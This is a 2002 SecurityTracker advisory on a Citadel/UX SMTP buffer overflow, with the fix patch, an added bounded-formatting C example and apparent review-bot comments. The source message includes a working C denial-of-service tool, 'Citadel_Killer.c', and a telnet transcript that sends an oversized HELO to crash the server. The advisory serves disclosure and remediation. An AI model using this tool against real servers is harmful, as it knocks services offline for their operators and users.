SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Citadel/UX
Vendors:   [Multiple Authors/Vendors]
Citadel/UX Bulletin Board System SMTP Buffer Overflow Lets Remote Users Crash the Bulletin Board Service
SecurityTracker Alert ID:  1003801
SecurityTracker URL:  http://securitytracker.com/id/1003801
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 12 2002
Impact:   Denial of service via network
Fix Available:  Yes  Exploit Included:  Yes  

Description:   A buffer overflow vulnerability was reported in the Citadel/UX bulletin board system. A remote user can cause the bulletin board server to crash.

It is reported that a buffer overflow in the Citadel/UX server allows a remote user to cause the service to crash by sending a large amount of data to the server's SMTP port. The server reportedly fails to check the size of the input before copying the input to a statically defined buffer.

A demonstration exploit transcript is provided:

[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]

[buffer] is around 4096 characters.
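
The unchecked copy into a statically sized buffer described above can be bounded and made to report truncation. The following is an added example, not code from the report or from Citadel/UX; the names bounded_log_format, demo_oversized_helo and LOG_BUF_SIZE and the sample HELO line are assumptions constructed for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF_SIZE 4096   /* same size as the buffer in the advisory's patch */

/* Hypothetical helper (not Citadel's code): format a message into a
 * fixed-size buffer. Returns 0 if it fit, 1 if it was truncated,
 * -1 on a formatting error or invalid arguments. */
static int bounded_log_format(char *out, size_t out_size, const char *format, ...)
{
    va_list ap;
    int needed;

    if (out == NULL || out_size == 0)
        return -1;
    va_start(ap, format);
    needed = vsnprintf(out, out_size, format, ap);  /* never writes past out_size */
    va_end(ap);

    if (needed < 0) {            /* encoding error (or pre-C99 truncation signal) */
        out[0] = '\0';
        return -1;
    }
    if ((size_t)needed >= out_size) {
        /* The message was cut: overwrite the tail with a visible marker. */
        static const char mark[] = "...[truncated]";
        if (out_size > sizeof(mark))
            memcpy(out + out_size - sizeof(mark), mark, sizeof(mark));
        return 1;
    }
    return 0;
}

/* Constructed input: an oversized HELO argument like the one in the advisory. */
static int demo_oversized_helo(char *out, size_t out_size)
{
    char arg[8001];
    memset(arg, 'a', sizeof(arg) - 1);
    arg[sizeof(arg) - 1] = '\0';
    return bounded_log_format(out, out_size, "SMTP: helo %s", arg);
}

int main(void)
{
    char buf[LOG_BUF_SIZE];
    int rc = demo_oversized_helo(buf, sizeof(buf));
    printf("rc=%d stored=%zu bytes\n", rc, strlen(buf));
    return 0;
}
```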

Impact:   A remote user can cause the bulletin board server to crash.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided a patch, available in the Source Message and shown below:

Patch for this Vulnerability:
--- citadel-old/sysdep.c Sat Dec 8 12:31:44
2001
+++ citadel/sysdep.c Sat Mar 9 05:51:11
2002
@@ -106,7 +106,7 @@
char buf[4096];

va_start(arg_ptr, format);
- vsprintf(buf, format, arg_ptr);
+ vsnprintf(buf, sizeof(buf), format, arg_ptr);
va_end(arg_ptr);

if (loglevel <= verbosity) {
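
Review bot: the `+` line discards the return value of vsnprintf, so a formatted message longer than sizeof(buf) - 1 (4095 bytes) is now cut silently. Consider capturing the result, for example `int n = vsnprintf(buf, sizeof(buf), format, arg_ptr);`, and when n is negative or n >= sizeof(buf) appending a truncation marker or logging the original length, so that an oversized request of the kind shown in the transcript stays visible in the log rather than just being shortened.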

Vendor URL:  uncnsrd.mt-kisco.ny.us/citadel/index.html
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Citadel/UX Server Remote DoS attack Vulnerability





What is Citadel/UX:

Citadel/UX is an advanced client/server BBS program 
for operating highly interactive sites, both on the 
Internet and over dialup. Users can connect to 
Citadel/UX using any of telnet, WWW, or client 
software. Among the features supported are public 
and private message bases (rooms), electronic mail, 
real-time chat, paging, etc. The server is 
multithreaded and can easily support a large number 
of concurrent users. In addition, SMTP and POP3 
servers are built-in for easy connection to Internet 
mail. Citadel/UX is both robust and mature, having 
been developed over the course of the past twelve 
years.

Problem:
I have found a buffer overflow in the Citadel/UX server. 
An attacker can execute a denial of service attack 
against it. Once the big buffer has been sent, the 
server is vulnerable.

Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]


[buffer] is around 4096 characters. 


/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.  
 * 
 *		by xperc@hotmail.com
 */
#include <stdio.h>
#include <stdlib.h>		/* exit */
#include <string.h>		/* memset, strlen */
#include <unistd.h>		/* close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>		/* inet_addr */

#define MAXBUF 		8000 
#define MAXBUF2		(MAXBUF+7)	/* "helo " + buffer + '\n' + NUL */
#define RECVBUF		256
#define CIT_SMTP	25	

int main(int argc, char *argv[])
{
	int sockfd;
	char msg[RECVBUF],buf[MAXBUF+1],sendbuf[MAXBUF2];
	struct sockaddr_in target;

	if(argc!=2){
		fprintf(stderr,"Usage: %s target_address\n",*argv);
		exit(-1);
	}
	if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0){
		perror("socket");
		exit(-1);
	}
	target.sin_family=AF_INET;
	target.sin_port=htons(CIT_SMTP);
	target.sin_addr.s_addr=inet_addr(argv[1]);
	if(connect(sockfd,(struct sockaddr*)&target,sizeof(target))<0){
		perror("connect");
		exit(-1);	
	}
	/* read the 220 greeting before sending the command */
	if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
		perror("recv");
		exit(-1);
	}

	memset(buf,'a',MAXBUF);
	buf[MAXBUF]='\0';	/* terminate the string before formatting it with %s */
	snprintf(sendbuf,sizeof(sendbuf),"helo %s\n",buf);

	send(sockfd,sendbuf,strlen(sendbuf),0);
	close(sockfd);

	return 0;
}

Patch for this Vulnerability:
--- citadel-old/sysdep.c	Sat Dec  8 12:31:44 
2001
+++ citadel/sysdep.c	Sat Mar  9 05:51:11 
2002
@@ -106,7 +106,7 @@
 	char buf[4096];
   
         va_start(arg_ptr, format);   
-        vsprintf(buf, format, arg_ptr);   
+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   
         va_end(arg_ptr);   
 
 	if (loglevel <= verbosity) { 
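
Review bot: the change bounds only the copy into `char buf[4096]` in sysdep.c; nothing in the visible lines limits how long a line the caller accepts before handing it to this formatter. It is worth adding a length check where the SMTP command is read as well, and auditing any remaining vsprintf, sprintf or strcpy calls into fixed-size buffers, since a fix at this one sink does not cover other buffers the same input may reach.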

 
 


Copyright 2019, SecurityGlobal.net LLC